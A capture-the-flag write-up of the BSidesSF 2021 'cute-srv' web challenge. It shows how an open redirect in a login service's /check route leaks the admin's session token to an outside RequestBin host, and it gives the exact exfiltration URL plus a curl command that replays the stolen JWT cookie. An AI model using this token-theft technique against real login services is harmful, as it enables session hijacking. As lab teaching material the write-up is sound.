Rating:
Check out https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#cute-srv for writeup with images.
This challenge was fun, cute and straight-forward once the bug is found.
First we're presented with a page of cute photos and the nav bar allows us to
Login or Submit a new image for review.
Looking in the source, there's a /flag.txt route which must be the goal of
the challenge, but when visiting it we get a message 'Not Authorized'.
If we visit Login we can click the only link available and it will
automatically log us in and redirect us to the main page.
on /submit it gives us the ability to submit a URL which the admin will
visit. This is typical in a lot of CSRF challenges, so we can start by checking
the User-Agent and other features when it visits our link, pointing to a server
we own or using something like https://requestbin.io/.
Even if we find XSS, the site is using HttpOnly cookies, so we probably need to find something else.
Checking out the Login route again while watching the requests, it does
something interesting. When requesting /check from the login service it will
include the session token in the URL, but does not restrict which URL it
redirects to. Using this bug we can force the Admin user to send their own
session token to our site instead.
We can use RequestBin again to steal the session token authtok, submitting this link to the admin:
https://loginsvc-0af88b56.challenges.bsidessf.net/check?continue=https%3A%2F%2Frequestbin.io%2F1oar7lu1
Now we can reach the /flag.txt route which is only available to the admin:
curl https://cutesrv-0186d981.challenges.bsidessf.net/flag.txt \
-b 'loginsid=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhdXRodG9rIiwiZXhwIjoxNjE4NDYyMjkyLCJpYXQiOjE2MTU3ODM4OTIsImlzcyI6ImxvZ2luc3ZjIiwibmJmIjoxNjE1NzgzODkyLCJzdWIiOiJhZG1pbiJ9.iA3lgwhmhOPNKh0_Wxmi923EOWdcUWcS-cIA_lxPhtExEGMeGkep3zweJ-MXtFyOwiDnMZ7Uuyuth9mFQ0lpMQ'
And we get the Flag!
FLAG: CTF{i_hope_you_made_it_through_2020_okay}
